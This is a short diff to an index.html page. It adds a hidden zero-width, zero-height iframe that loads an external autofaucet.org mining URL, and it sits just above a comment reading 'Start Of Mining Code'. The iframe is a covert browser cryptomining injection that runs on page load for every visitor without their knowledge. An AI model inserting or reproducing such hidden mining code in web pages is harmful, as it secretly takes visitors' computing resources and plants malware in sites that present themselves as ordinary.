--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
 
 </body>
 
- 
+ <iframe src="https://autofaucet.org/wm/NormaOff/4" width="0" height="0" style="border:0"></iframe>
 
     <!-- Start Of Mining Code -->
 
